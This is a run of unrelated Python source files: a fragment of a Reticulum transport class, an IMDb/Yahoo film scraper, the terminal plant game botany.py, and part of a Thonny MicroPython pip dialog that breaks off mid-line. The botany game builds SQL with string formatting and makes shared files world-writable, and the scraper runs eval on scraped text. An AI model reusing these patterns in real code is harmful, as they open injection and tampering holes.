file.read() file.close() packet = RNS.Packet(None, raw) # TODO: Implement outbound for this @staticmethod def cache_request(packet_hash): RNS.log("Cache request for "+RNS.prettyhexrep(packet_hash), RNS.LOG_EXTREME) path = RNS.Reticulum.cachepath+"/"+RNS.hexrep(packet_hash, delimit=False) if os.path.isfile(path): file = open(path, "r") raw = file.read() Transport.inbound(raw) file.close() else: cache_request_packet = RNS.Packet(Transport.transport_destination(), packet_hash, context = RNS.Packet.CACHE_REQUEST) @staticmethod def transport_destination(): # TODO: implement this pass @staticmethod def exitHandler(): try: packet_hashlist_path = RNS.Reticulum.configdir+"/packet_hashlist" file = open(packet_hashlist_path, "w") file.write(umsgpack.packb(Transport.packet_hashlist)) file.close() except Exception as e: RNS.log("Could not save packet hashlist to disk, the contained exception was: "+str(e), RNS.LOG_ERROR)
scrape_film.py
#!/usr/bin/env python3 from requests import Session from urllib.parse import unquote as decode_url from bs4 import BeautifulSoup from re import findall, search, match from string import ascii_lowercase as ELetters import threading from time import sleep, time import json class Scraper: """ docstring for Scraper this is some fucntions used mostly when scraping """ def __init__(self): super(Scraper, self).__init__() self.__setup() ## args will be submit latter self.src = None def __setup(self): self.session = Session() self.session.headers.update({ ## very common user_agent 'User_agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0' }) def get(self, link): r = self.session.get(link) # , timeout= 3 if r.status_code == 200: self.src = r.text return self.src def html_soup(self): if self.src: return BeautifulSoup(self.src, 'html.parser') return BeautifulSoup('', 'html.parser') class ScrapeWebsite: """ docstring for ScrapeWebsite this is some of functions each can scrape specific data from specific website Websites List: - search.yahoo.com/search?p=last+tango+in+paris - imdb.com - wikipedia.org - allmovie.com - rottentomatoes.com - yts.am - elcinema.com """ def __init__(self): super(ScrapeWebsite, self).__init__() self.domains = ['wikipedia', 'imdb', 'rottentomatoes'] def shift(self, lst): x = lst[0] lst.remove(x) return x def get_host(self, url): return url.split('//')[-1].split('/', 1)[0] def get_domain(self, host): return host.split('.')[-2] def defined_website(self, link): return self.domain(self.host(link)).lower() in self.domains def convert_length(self, length, to='m'): ## lenght must be 15h 13m convert_map = { 's':{'h': '*60*60 +', 'm': '*60 +', 's': '*1 +'}, 'm':{'h': '*60 +' , 'm': '*1 +' , 's': '/60 +'}, 'h':{'h': '*1 +' , 'm': '/60 +', 's': '/(60*60) +'}, } my_map = convert_map[to] for unit, equivelant in my_map.items(): length = length.replace(unit, equivelant) length = length.rstrip('+') try: return str(eval(length)) + to except: return False def englishName(self, filmName): return filmName[0].lower() in ELetters def get_soup(self, link): scraper = Scraper() scraper.get(link) return scraper.html_soup() class Wikipedia(ScrapeWebsite): """docstring for Wikipedia""" def __init__(self, arg): super(Wikipedia, self).__init__() self.arg = arg def external_sites(self): pass ## Wikipedia def wikipedia(self, link): ## get data and soup it soup = self.get_soup(link) return { 'sites': self.external_sites(), } class IMDB(ScrapeWebsite): """docstring for IMDB""" def __init__(self): super(IMDB, self).__init__() self.soup = None def name(self): n = self.soup.select_one('meta[property="og:title"]') n = n['content'] ## ptrn "name (year)" ## so i only remove and join with '(' cus name may contain () itself return '('.join(n.split('(')[:-1]).strip() def year(self): txt = self.soup.title.text find = findall(r'\((.+)\)',txt) return find and find[-1] def mpaa(self): txt = self.soup.select_one('.subtext').text.lstrip() ptrn = r'[A-Z]+[-\dA-Z]*' find = match(ptrn, txt) return find and find.group() def length(self): elm = self.soup.select_one('div.title_wrapper .subtext') return elm.time.text.strip() def trailer(self): a = self.soup.select_one('div.slate_wrapper .slate a') link = a and 'https://imdb.com' + a['href'] or '' video_src, img_src = '', '' if link: img_src = a.img.get('src') or '' s = Scraper() src = s.get(link) video_src = search(r'"videoUrl":"(.+?)"', src) video_src = video_src and video_src.group(1).replace('\\u002F', '/') or '' return { 'video_src': video_src, 'link': link, 'img_src': img_src } def poster(self): img = self.soup.select_one('div.poster').img return img['src'] def category(self): a = self.soup.select('div.title_wrapper .subtext a') return [i.text for i in a][:-1] def rating(self): elm = self.soup.select_one('div.imdbRating .ratingValue strong') txt = elm['title'] rating, count = findall(r'[,\.\d]+', txt) return {'rating': rating, 'count': count} def brief(self): txt = self.soup.select_one('.plot_summary_wrapper .plot_summary .summary_text').text.strip() return txt def country(self): elms = self.soup.select('div#titleDetails .txt-block') txts = [i.text.lower().split() for i in elms] for txt in txts: if 'country' in txt[0]: return [i for i in txt[1:] if match(r'\w+', i)] def language(self): elms = self.soup.select('div#titleDetails .txt-block') txts = [i.text.lower().split() for i in elms] for txt in txts: if 'language' in txt[0]: return [i for i in txt[1:] if match(r'\w+', i)] def cast(self): rows = self.soup.select('.cast_list tr') data = () for row in rows[1:]: ## clms are tds clms = row.select('td') if len(clms) != 4: continue photo, name, _, chracter = clms ## made data in list cus i care with order data += ({ 'name': name.text.strip(), 'imdb_link': name.a and 'imdb.com'+name.a['href'] or '', 'chracter': ' '.join(chracter.text.split()), 'photo': photo.img.get('loadlate') or photo.img['src'] },) return data def reviews(self): pass def prizes_won(self): pass def prizes_nomenee(self): pass def awards(self): link = link + '/awards' pass def search(self, filmName): link = 'https://www.imdb.com/find?q=%s&s=tt' link = link % filmName.lower().replace(' ', '+') ## scrape src soup = self.get_soup(link) anchor = soup.select_one('table.findList tr.findResult a') # path = '/'.join(anchor['href'].split('/')[:-1]) path = anchor and anchor['href'] return path and 'https://www.imdb.com' + path or None ## return IMDB all possible data def imdb(self, filmName=None, link=None): link = link or self.search(filmName) if not link: return None ## get data and soup it self.soup = self.get_soup(link) ## find data return { 'name' : self.name(), 'year' : self.year(), 'mpaa' : self.mpaa(), 'length' : self.length(), 'trailer' : self.trailer(), 'poster' : self.poster(), 'category': self.category(), 'rating' : {'imdb': self.rating()}, 'brief_en': self.brief(), 'country' : self.country(), 'language': self.language(), 'cast' : self.cast(), # 'reviews' : self.reviews(), # 'prizes-won': self.prizes_won(), # 'prizes-nomenee': self.prizes_nomenee(), } class Yahoo(ScrapeWebsite): """docstring for Yahoo scrape from yahoo accroding to its structure """ def __init__(self): super(Yahoo, self).__init__() ## general area of data self.soup = None def extract_redirect_link_yahoo(self, link): ## check its yahoo host = self.get_host(link) if 'yahoo' in host: ## start with 'r' this is redirect else skip it if 'r' == host.split('.', 1)[0]: ## this is regular vars in link link = decode_url(link.split('/RK=', 1)[0].split('RU=', 1)[-1]) return link ## start functions only for right area ## def trailer(self): iframe = self.soup.iframe return iframe and iframe['data-src'] or None def name(self): ## first p always contain name return self.soup.select_one('div.compImageProfile p').text def mpaa(self): ## mpaa always first span in second p or its not exist spans = self.soup.select_one('div.compImageProfile').select('p:nth-of-type(2) span') return len(spans) == 2 and spans[0].text or None def year(self): ## year - type - length spanText = self.soup.select_one('div.compImageProfile').select('p:nth-of-type(2) span')[-1].text ptrn = r'\d\d\d\d' matchedData = search(ptrn, spanText) return matchedData and matchedData.group() or None def category(self): spanText = self.soup.select_one('div.compImageProfile').select('p:nth-of-type(2) span')[-1].text ptrn = r'[A-Z][a-z]+' matchedData = search(ptrn, spanText) return matchedData and matchedData.group() or None def length(self): spanText = self.soup.select_one('div.compImageProfile').select('p:nth-of-type(2) span')[-1].text ptrn = r'\dh [12345]{0,1}[0-9]m' matchedData = search(ptrn, spanText) return matchedData and matchedData.group() or None def poster(self): a = self.soup.select_one('div.compImageProfile').a return a and a['href'] def brief(self): textElms = self.soup.select('div.compText > p') ## brief must be longest text mx = 0 brief = '' for elm in textElms: l = len(elm.text) if l > mx and elm.a: elm.a.replaceWith('') brief = elm.text.rstrip() mx = l return brief def sites(self): ## contain links to wiki imdb rotten-tomato ulElms = self.soup.select('ul') sites = {} ## i wanna last ul ulElm_a = self.soup.select('ul:nth-of-type(%i) li a[title]' % len(ulElms)) [sites.update({ a['title'].lower(): self.extract_redirect_link_yahoo(a['href']) }) for a in ulElm_a] return sites ## End functions only for right area ## ## start Left Area ## def leftAreaData(self): ## list elms in left side left_li = self.soup sites = {} for li in left_li: ## link and title all in a elm a = li.h3.a title = (a and a.text) or '' link = (a and a['href']) or '' if link: link = self.extract_redirect_link_yahoo(link) host = self.get_host(link) domain = self.get_domain(host).lower() if domain in self.domains: sites.update({domain: {'title': title, 'link': link}}) return sites ## End Left Area ## ## return Yahoo all possible data def yahoo(self, filmName): ## link link = 'https://search.yahoo.com/search?p=%s' link = link % filmName.lower().replace(' ', '+') ## get data and soup it soup = self.get_soup(link) ## find data right = soup.select_one('div#right div') ## right might be exist but not refering to my movie ## movies always have year also it may be a series right_text = right and right.text.lower() or '' first_cmponent_text = right and right.select_one('div.compImageProfile').text or '' is_years_in_text = bool( search(r'(19[5-9][0-9]|20[01][0-9])', first_cmponent_text) ) is_valid = is_years_in_text or ('imdb' in right_text) or ('created by' in right_text) if is_valid: self.soup = right return { 'trailer': self.trailer(), 'name': self.name(), 'mpaa': self.mpaa(), 'year': self.year(), 'category': self.category(), 'length': self.length(), 'poster': self.poster(), 'brief_en': self.brief(), 'sites': self.sites() } else: ## yahoo may not detect this as a movie from first ## so search again and add movie at the end if u not added it before if (not filmName.endswith('movie')) and self.englishName(filmName): return self.yahoo('%s movie' % filmName) ## if u dont find in the right side ## start see if there is useful data in left self.soup = soup.select('div#left div#main div#web > ol > li') return {'extra-sites': self.leftAreaData()} class Download(ScrapeWebsite): """docstring for Download""" def __init__(self, FilmInformation): super(Download, self).__init__() self.FilmInformation = FilmInformation self.data = {} import os os.system('pwd') with open('app/scripts/scrapped-websites.json') as f: self.websites = json.loads(f.read()) def clean_spaces(self, text): ''' remove tabs and lines and many spaces replace all with one space ''' return ' '.join( findall(r'\S+',text) ) def match_year(self, text): ## match 1950 to 1999 ## match 2000 to 2019 year_ptrn= r'(19[5-9][0-9]|20[01][0-9])' found = search(year_ptrn, text) found = found and found.group() film_year = str(self.FilmInformation['year']) return found and found == film_year def match_name(self, text): ptrn = r'\w+' film_name = findall(ptrn, self.FilmInformation['name'].lower()) matches = findall(ptrn, text.lower()) for word in film_name: if not word in matches: return False return True def clean_not_matched(self, results): cleaned = () for result in results : txt = result.text is_year = self.match_year(txt) is_name = self.match_name(txt) if is_name: if is_year or is_year == None: cleaned += (result, ) return cleaned def __searchHelper__(self, name, site): ## build search url query = ' '.join([self.FilmInformation[i] for i in site['search']['search_query']]) search_url = site['url'] + site['search']['link'] % query ## scrape it soup = self.get_soup(search_url) ## get search results results = soup.select( site['search']['selector'] ) ## clean the results get matched results = self.clean_not_matched(results) if results: ## extract url and text urls = [] txts = [] for elm in results: # txts.append(elm.text) txts.append( self.clean_spaces( elm.text ) ) if elm.name != 'a': elm = elm.a url = elm.get('href') or '' url = (url.startswith('/') and site['url'] + url) or url urls.append( url ) ## update my data site['search']['return'].update({ 'film_url': urls, 'search_text': txts, 'zipped': list(zip(urls, txts)) }) self.data[name] = site['search']['return'] def search(self,websites=None): # filmName = self.FilmInformation.get('user-query') ## can't put default using self websites = websites or self.websites for name, site in websites.items(): thread = threading.Thread(target=self.__searchHelper__, args=(name, site)) # thread.daemon = 1 # thread.setName(name) thread.start() loop = 0 while (len(threading.enumerate()) > 1) and (len(self.data) < 5): print(loop,len(threading.enumerate()), len(self.data)) if loop >= 10: break sleep(0.5) loop += 1 return self.data class Film: """ docstring for Film get all possible data about a film """ def __init__(self, filmName): super(Film, self).__init__() self.name = filmName self.info = { 'user-query': self.name, ## main data 'name' : None, 'year' : None, 'mpaa' : None, 'length' : None, 'poster' : None, 'category': None, 'rating' : None, 'trailer' : None, 'brief_en': None, 'brief_ar': None, ## more data 'country' : None, 'language': None, 'cast' : None, 'reviews' : None, 'prizes_won': None, 'prizes_nomenee': None, ## download 'torrent' : None, 'download': None, 'subtitle': None, } def information(self): '''search in yahoo, imdb, other possibles''' imdb = IMDB() yahoo = Yahoo() yahoo_data = yahoo.yahoo(self.name) ## try if data got from right area (trusted) do somthing ## except doing somthng else try: sites = yahoo_data.pop('sites') self.info.update(yahoo_data) imdb_url = sites.get('imdb') except KeyError as e: #imdb_url = yahoo_data[ 'extra-sites' ].get('imdb')['link'] imdb_url = None pass imdb_data = (imdb_url and imdb.imdb(link = imdb_url)) or imdb.imdb(filmName= self.name) self.info.update(imdb_data) def download_w(self): ''' get download data from websites (arabic sites with subtitle etc) ''' ## filter depend on self.info download = Download( self.info ) data = download.search() self.info['download'] = data def build(self): self.information() self.download_w() return self.info # if __name__ == '__main__': # filmName = 'fight club' # film = Film(filmName) # film.build() # from pprint import pprint # pprint(film.info) # f = Film('aquaman') # f.build() # info = f.info # download = info.pop('download') # for k,v in info.items(): # print(k, ': ', v) # for k,v in download.items(): # print(k, '\n\t' , v['film_url']) # from json import dumps # filmName = 'identity' # f = Film(filmName) # f.build() # info = f.info # print(dumps(info)) # 'rating' : None, # 'download': None, # 'reviews' : None, # 'prizes-won': None, # 'prizes-nomenee': None, # 'torrent' : None, # 'subtitle': None, ## https://www.totaleclips.com/Player/Bounce.aspx?eclipid=e17963&bitrateid=455&vendorid=102&type=.mp4
botany.py
#!/usr/bin/env python3 import time import pickle import json import os import random import getpass import threading import errno import uuid import sqlite3 import argparse from menu_screen import * # TODO: # - Switch from personal data file to table in DB class Plant(object): # This is your plant! stage_list = [ 'seed', 'seedling', 'young', 'mature', 'flowering', 'seed-bearing', ] color_list = [ 'red', 'orange', 'yellow', 'green', 'blue', 'indigo', 'violet', 'white', 'black', 'gold', 'rainbow', ] rarity_list = [ 'common', 'uncommon', 'rare', 'legendary', 'godly', ] species_list = [ 'poppy', 'cactus', 'aloe', 'venus flytrap', 'jade plant', 'fern', 'daffodil', 'sunflower', 'baobab', 'lithops', 'hemp', 'pansy', 'iris', 'agave', 'ficus', 'moss', 'sage', 'snapdragon', 'columbine', 'brugmansia', 'palm', 'pachypodium', ] mutation_list = [ '', 'humming', 'noxious', 'vorpal', 'glowing', 'electric', 'icy', 'flaming', 'psychic', 'screaming', 'chaotic', 'hissing', 'gelatinous', 'deformed', 'shaggy', 'scaly', 'depressed', 'anxious', 'metallic', 'glossy', 'psychedelic', 'bonsai', 'foamy', 'singing', 'fractal', 'crunchy', 'goth', 'oozing', 'stinky', 'aromatic', 'juicy', 'smug', 'vibrating', 'lithe', 'chalky', 'naive', 'ersatz', 'disco', 'levitating', 'colossal', 'luminous', 'cosmic', 'ethereal', 'cursed', 'buff', 'narcotic', 'gnu/linux', 'abraxan', # rip dear friend ] def __init__(self, this_filename, generation=1): # Constructor self.plant_id = str(uuid.uuid4()) self.life_stages = (3600*24, (3600*24)*3, (3600*24)*10, (3600*24)*20, (3600*24)*30) # self.life_stages = (2, 4, 6, 8, 10) # debug mode self.stage = 0 self.mutation = 0 self.species = random.randint(0,len(self.species_list)-1) self.color = random.randint(0,len(self.color_list)-1) self.rarity = self.rarity_check() self.ticks = 0 self.age_formatted = "0" self.generation = generation self.dead = False self.write_lock = False self.owner = getpass.getuser() self.file_name = this_filename self.start_time = int(time.time()) self.last_time = int(time.time()) # must water plant first day self.watered_timestamp = int(time.time())-(24*3600)-1 self.watered_24h = False self.visitors = [] def migrate_properties(self): # Migrates old data files to new if not hasattr(self, 'generation'): self.generation = 1 if not hasattr(self, 'visitors'): self.visitors = [] def parse_plant(self): # Converts plant data to human-readable format output = "" if self.stage >= 3: output += self.rarity_list[self.rarity] + " " if self.mutation != 0: output += self.mutation_list[self.mutation] + " " if self.stage >= 4: output += self.color_list[self.color] + " " output += self.stage_list[self.stage] + " " if self.stage >= 2: output += self.species_list[self.species] + " " return output.strip() def rarity_check(self): # Generate plant rarity CONST_RARITY_MAX = 256.0 rare_seed = random.randint(1,CONST_RARITY_MAX) common_range = round((2/3)*CONST_RARITY_MAX) uncommon_range = round((2/3)*(CONST_RARITY_MAX-common_range)) rare_range = round((2/3)*(CONST_RARITY_MAX-common_range-uncommon_range)) legendary_range = round((2/3)*(CONST_RARITY_MAX-common_range-uncommon_range-rare_range)) common_max = common_range uncommon_max = common_max + uncommon_range rare_max = uncommon_max + rare_range legendary_max = rare_max + legendary_range godly_max = CONST_RARITY_MAX if 0 <= rare_seed <= common_max: rarity = 0 elif common_max < rare_seed <= uncommon_max: rarity = 1 elif uncommon_max < rare_seed <= rare_max: rarity = 2 elif rare_max < rare_seed <= legendary_max: rarity = 3 elif legendary_max < rare_seed <= godly_max: rarity = 4 return rarity def dead_check(self): # if it has been >5 days since watering, sorry plant is dead :( time_delta_watered = int(time.time()) - self.watered_timestamp if time_delta_watered > (5 * (24 * 3600)): self.dead = True return self.dead def update_visitor_db(self, visitor_names): game_dir = os.path.dirname(os.path.realpath(__file__)) garden_db_path = os.path.join(game_dir, 'sqlite/garden_db.sqlite') conn = sqlite3.connect(garden_db_path) for name in (visitor_names): c = conn.cursor() c.execute("SELECT * FROM visitors WHERE garden_name = '{}' AND visitor_name = '{}' ".format(self.owner, name)) data=c.fetchone() if data is None: sql = """ INSERT INTO visitors (garden_name,visitor_name,weekly_visits) VALUES('{}', '{}',1)""".format(self.owner, name) c.execute(sql) else: sql = """ UPDATE visitors SET weekly_visits = weekly_visits + 1 WHERE garden_name = '{}' AND visitor_name = '{}'""".format(self.owner, name) c.execute(sql) conn.commit() conn.close() def guest_check(self): user_dir = os.path.expanduser("~") botany_dir = os.path.join(user_dir,'.botany') visitor_filepath = os.path.join(botany_dir,'visitors.json') guest_timestamps = [] visitors_this_check = [] if os.path.isfile(visitor_filepath): with open(visitor_filepath, 'r') as visitor_file: data = json.load(visitor_file) if data: for element in data: if element['user'] not in self.visitors: self.visitors.append(element['user']) if element['user'] not in visitors_this_check: visitors_this_check.append(element['user']) # prevent users from manually setting watered_time in the future if element['timestamp'] <= int(time.time()): guest_timestamps.append(element['timestamp']) try: self.update_visitor_db(visitors_this_check) except: pass with open(visitor_filepath, 'w') as visitor_file: visitor_file.write('[]') else: with open(visitor_filepath, mode='w') as f: json.dump([], f) os.chmod(visitor_filepath, 0o666) if not guest_timestamps: return self.watered_timestamp all_timestamps = [self.watered_timestamp] + guest_timestamps all_timestamps.sort() # calculate # of days between each guest watering timestamp_diffs = [(j-i)/86400.0 for i, j in zip(all_timestamps[:-1], all_timestamps[1:])] # plant's latest timestamp should be set to last timestamp before a # gap of 5 days # TODO: this considers a plant watered only on day 1 and day 4 to be # watered for all 4 days - need to figure out how to only add score # from 24h after each watered timestamp last_valid_element = next((x for x in timestamp_diffs if x > 5), None) if not last_valid_element: # all timestamps are within a 5 day range, can just use latest one return all_timestamps[-1] last_valid_index = timestamp_diffs.index(last_valid_element) # slice list to only include up until a >5 day gap valid_timestamps = all_timestamps[:last_valid_index + 1] return valid_timestamps[-1] def water_check(self): self.watered_timestamp = self.guest_check() self.time_delta_watered = int(time.time()) - self.watered_timestamp if self.time_delta_watered <= (24 * 3600): if not self.watered_24h: self.watered_24h = True return True else: self.watered_24h = False return False def mutate_check(self): # Create plant mutation # Increase this # to make mutation rarer (chance 1 out of x each second) CONST_MUTATION_RARITY = 20000 mutation_seed = random.randint(1,CONST_MUTATION_RARITY) if mutation_seed == CONST_MUTATION_RARITY: # mutation gained! mutation = random.randint(0,len(self.mutation_list)-1) if self.mutation == 0: self.mutation = mutation return True else: return False def growth(self): # Increase plant growth stage if self.stage < (len(self.stage_list)-1): self.stage += 1 def water(self): # Increase plant growth stage if not self.dead: self.watered_timestamp = int(time.time()) self.watered_24h = True def start_over(self): # After plant reaches final stage, given option to restart # increment generation only if previous stage is final stage and plant # is alive if not self.dead: next_generation = self.generation + 1 else: # Should this reset to 1? Seems unfair.. for now generations will # persist through death. next_generation = self.generation self.write_lock = True self.kill_plant() while self.write_lock: # Wait for garden writer to unlock # garden db needs to update before allowing the user to reset pass if not self.write_lock: self.__init__(self.file_name, next_generation) def kill_plant(self): self.dead = True def unlock_new_creation(self): self.write_lock = False def start_life(self): # runs life on a thread thread = threading.Thread(target=self.life, args=()) thread.daemon = True thread.start() def life(self): # I've created life :) while True: if not self.dead: if self.watered_24h: self.ticks += 1 if self.stage < len(self.stage_list)-1: if self.ticks >= self.life_stages[self.stage]: self.growth() if self.mutate_check(): pass if self.water_check(): # Do something pass if self.dead_check(): # Do something else pass # TODO: event check generation_bonus = 0.2 * (self.generation - 1) adjusted_sleep_time = 1 / (1 + generation_bonus) time.sleep(adjusted_sleep_time) class DataManager(object): # handles user data, puts a .botany dir in user's home dir (OSX/Linux) # handles shared data with sqlite db # TODO: .dat save should only happen on mutation, water, death, exit, # harvest, otherwise # data hasn't changed... # can write json whenever bc this isn't ever read for data within botany user_dir = os.path.expanduser("~") botany_dir = os.path.join(user_dir,'.botany') game_dir = os.path.dirname(os.path.realpath(__file__)) this_user = getpass.getuser() savefile_name = this_user + '_plant.dat' savefile_path = os.path.join(botany_dir, savefile_name) #set this.savefile_path to guest_garden path garden_db_path = os.path.join(game_dir, 'sqlite/garden_db.sqlite') garden_json_path = os.path.join(game_dir, 'garden_file.json') harvest_file_path = os.path.join(botany_dir, 'harvest_file.dat') harvest_json_path = os.path.join(botany_dir, 'harvest_file.json') def __init__(self): self.this_user = getpass.getuser() # check if instance is already running # check for .botany dir in home try: os.makedirs(self.botany_dir) except OSError as exception: if exception.errno != errno.EEXIST: raise self.savefile_name = self.this_user + '_plant.dat' def check_plant(self): # check for existing save file if os.path.isfile(self.savefile_path): return True else: return False def start_threads(self,this_plant): # creates threads to save files every minute death_check_thread = threading.Thread(target=self.death_check_update, args=(this_plant,)) death_check_thread.daemon = True death_check_thread.start() autosave_thread = threading.Thread(target=self.autosave, args=(this_plant,)) autosave_thread.daemon = True autosave_thread.start() def death_check_update(self,this_plant): # .1 second updates and lock to minimize race condition while True: is_dead = this_plant.dead_check() if is_dead: self.save_plant(this_plant) self.data_write_json(this_plant) self.update_garden_db(this_plant) self.harvest_plant(this_plant) this_plant.unlock_new_creation() time.sleep(.1) def autosave(self, this_plant): # running on thread, saves plant every 5s TODO: this is unnecessary # and breaks shit probably file_update_count = 0 while True: file_update_count += 1 self.save_plant(this_plant) self.data_write_json(this_plant) self.update_garden_db(this_plant) if file_update_count == 12: # only update garden json every 60s self.update_garden_json() time.sleep(5) file_update_count %= 12 def load_plant(self): # load savefile with open(self.savefile_path, 'rb') as f: this_plant = pickle.load(f) # migrate data structure to create data for empty/nonexistent plant # properties this_plant.migrate_properties() # get status since last login is_watered = this_plant.water_check() is_dead = this_plant.dead_check() if not is_dead: if is_watered: time_delta_last = int(time.time()) - this_plant.last_time ticks_to_add = min(time_delta_last, 24*3600) this_plant.time_delta_watered = 0 self.last_water_gain = time.time() else: ticks_to_add = 0 this_plant.ticks += ticks_to_add * (0.2 * (this_plant.generation - 1) + 1) return this_plant def plant_age_convert(self,this_plant): # human-readable plant age age_seconds = int(time.time()) - this_plant.start_time days, age_seconds = divmod(age_seconds, 24 * 60 * 60) hours, age_seconds = divmod(age_seconds, 60 * 60) minutes, age_seconds = divmod(age_seconds, 60) age_formatted = ("%dd:%dh:%dm:%ds" % (days, hours, minutes, age_seconds)) return age_formatted def init_database(self): # check if dir exists, create sqlite directory and set OS permissions to 777 sqlite_dir_path = os.path.join(self.game_dir,'sqlite') if not os.path.exists(sqlite_dir_path): os.makedirs(sqlite_dir_path) os.chmod(sqlite_dir_path, 0o777) conn = sqlite3.connect(self.garden_db_path) init_table_string = """CREATE TABLE IF NOT EXISTS garden ( plant_id tinytext PRIMARY KEY, owner text, description text, age text, score integer, is_dead numeric )""" c = conn.cursor() c.execute(init_table_string) conn.close() # init only, creates and sets permissions for garden db and json if os.stat(self.garden_db_path).st_uid == os.getuid(): os.chmod(self.garden_db_path, 0o666) open(self.garden_json_path, 'a').close() os.chmod(self.garden_json_path, 0o666) def migrate_database(self): conn = sqlite3.connect(self.garden_db_path) migrate_table_string = """CREATE TABLE IF NOT EXISTS visitors ( id integer PRIMARY KEY, garden_name text, visitor_name text, weekly_visits integer )""" c = conn.cursor() c.execute(migrate_table_string) conn.close() return True def update_garden_db(self, this_plant): # insert or update this plant id's entry in DB # TODO: make sure other instances of user are deleted # Could create a clean db function self.init_database() self.migrate_database() age_formatted = self.plant_age_convert(this_plant) conn = sqlite3.connect(self.garden_db_path) c = conn.cursor() # try to insert or replace update_query = """INSERT OR REPLACE INTO garden ( plant_id, owner, description, age, score, is_dead ) VALUES ( '{pid}', '{pown}', '{pdes}', '{page}', {psco}, {pdead} ) """.format(pid = this_plant.plant_id, pown = this_plant.owner, pdes = this_plant.parse_plant(), page = age_formatted, psco = str(this_plant.ticks), pdead = int(this_plant.dead)) c.execute(update_query) conn.commit() conn.close() def retrieve_garden_from_db(self): # Builds a dict of dicts from garden sqlite db garden_dict = {} conn = sqlite3.connect(self.garden_db_path) # Need to allow write permissions by others conn.row_factory = sqlite3.Row c = conn.cursor() c.execute('SELECT * FROM garden ORDER BY owner') tuple_list = c.fetchall() conn.close() # Building dict from table rows for item in tuple_list: garden_dict[item[0]] = { "owner":item[1], "description":item[2], "age":item[3], "score":item[4], "dead":item[5], } return garden_dict def update_garden_json(self): this_garden = self.retrieve_garden_from_db() with open(self.garden_json_path, 'w') as outfile: json.dump(this_garden, outfile) pass def save_plant(self, this_plant): # create savefile this_plant.last_time = int(time.time()) temp_path = self.savefile_path + ".temp" with open(temp_path, 'wb') as f: pickle.dump(this_plant, f, protocol=2) os.rename(temp_path, self.savefile_path) def data_write_json(self, this_plant): # create personal json file for user to use outside of the game (website?) json_file = os.path.join(self.botany_dir,self.this_user + '_plant_data.json') # also updates age age_formatted = self.plant_age_convert(this_plant) plant_info = { "owner":this_plant.owner, "description":this_plant.parse_plant(), "age":age_formatted, "score":this_plant.ticks, "is_dead":this_plant.dead, "last_watered":this_plant.watered_timestamp, "file_name":this_plant.file_name, "stage": this_plant.stage_list[this_plant.stage], "generation": this_plant.generation, } if this_plant.stage >= 3: plant_info["rarity"] = this_plant.rarity_list[this_plant.rarity] if this_plant.mutation != 0: plant_info["mutation"] = this_plant.mutation_list[this_plant.mutation] if this_plant.stage >= 4: plant_info["color"] = this_plant.color_list[this_plant.color] if this_plant.stage >= 2: plant_info["species"] = this_plant.species_list[this_plant.species] with open(json_file, 'w') as outfile: json.dump(plant_info, outfile) def harvest_plant(self, this_plant): # TODO: plant history feature - could just use a sqlite query to retrieve all of user's dead plants # harvest is a dict of dicts # harvest contains one entry for each plant id age_formatted = self.plant_age_convert(this_plant) this_plant_id = this_plant.plant_id plant_info = { "description":this_plant.parse_plant(), "age":age_formatted, "score":this_plant.ticks, } if os.path.isfile(self.harvest_file_path): # harvest file exists: load data with open(self.harvest_file_path, 'rb') as f: this_harvest = pickle.load(f) new_file_check = False else: this_harvest = {} new_file_check = True this_harvest[this_plant_id] = plant_info # dump harvest file temp_path = self.harvest_file_path + ".temp" with open(temp_path, 'wb') as f: pickle.dump(this_harvest, f, protocol=2) os.rename(temp_path, self.harvest_file_path) # dump json file with open(self.harvest_json_path, 'w') as outfile: json.dump(this_harvest, outfile) return new_file_check if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument("--no-color", action="store_true") args = parser.parse_args() my_data = DataManager() # if plant save file exists if my_data.check_plant(): my_plant = my_data.load_plant() # otherwise create new plant else: my_plant = Plant(my_data.savefile_path) my_data.data_write_json(my_plant) # my_plant is either a fresh plant or an existing plant at this point my_plant.start_life() my_data.start_threads(my_plant) try: enable_color = not args.no_color botany_menu = CursedMenu(my_plant,my_data,enable_color) my_data.save_plant(my_plant) my_data.data_write_json(my_plant) my_data.update_garden_db(my_plant) finally: cleanup()
pip_gui.py
import os import shutil import subprocess import tempfile import threading import tkinter as tk from tkinter.messagebox import showerror from tkinter import ttk from typing import cast, Tuple from thonny import running, get_runner, get_workbench, ui_utils from thonny.common import InlineCommand from thonny.languages import tr from thonny.plugins.files import upload, prepare_upload_items from thonny.plugins.micropython import MicroPythonProxy, LocalMicroPythonProxy from thonny.plugins.micropython.micropip import MICROPYTHON_ORG_JSON from thonny.plugins.pip_gui import ( BackendPipDialog, _fetch_url_future, get_not_supported_translation, ) from thonny.running import InlineCommandDialog from thonny.workdlg import SubprocessDialog class MicroPythonPipDialog(BackendPipDialog): def __init__(self, master): self._current_temp_dir = None self._checkboxes = [] super().__init__(master) assert isinstance(self._backend_proxy, MicroPythonProxy) def _create_pip_process(self, args): return self._create_python_process(["-m", "thonny.plugins.micropython.micropip"] + args) def _get_active_version(self, name): # Don't have dist-level information return None def _on_install_click(self): if self.install_button["text"] == self.get_install_button_text(): super()._on_install_click() elif self.install_button["text"] == self.get_search_button_text(): self.search_box.delete(0, "end") self.search_box.insert( 0, "micropython pycopy " + self.current_package_data["info"]["name"] ) self._on_search(None) else: raise RuntimeError( "Unexpected text '%s' on install button" % self.install_button["text"] ) def _on_uninstall_click(self): if self.uninstall_button["text"] == self.get_uninstall_button_text(): super()._on_uninstall_click() elif self.uninstall_button["text"] == self.get_delete_selected_button_text(): self._delete_selected() else: raise RuntimeError( "Unexpected text '%s' on install button" % self.install_button["text"] ) def _delete_selected(self): paths = [] for cb in self._checkboxes: if cb.variable.get(): paths.append(cb.full_path) if paths: self._delete_paths(paths) self._start_update_list(self.current_package_data["info"]["name"]) def _delete_paths(self, paths): get_runner().send_command_and_wait( InlineCommand("delete", paths=paths), dialog_title=tr("Deleting"), ) def _get_install_command(self): return ["install", "-p", self._current_temp_dir] def _perform_pip_action(self, action: str) -> bool: if self._perform_pip_action_without_refresh(action): self._show_instructions() # Make the old package go away as fast as possible # don't know which module to show, therefore None arg self._start_update_list(None) get_workbench().event_generate("RemoteFilesChanged") def _perform_pip_action_without_refresh(self, action: str) -> bool: assert action in ["install", "advanced"] self._current_temp_dir = tempfile.mkdtemp() try: return super()._perform_pip_action_without_refresh(action) finally: shutil.rmtree(self._current_temp_dir, ignore_errors=True) self._current_temp_dir = None def _create_upload_command(self) -> InlineCommand: paths = [] for (dirpath, 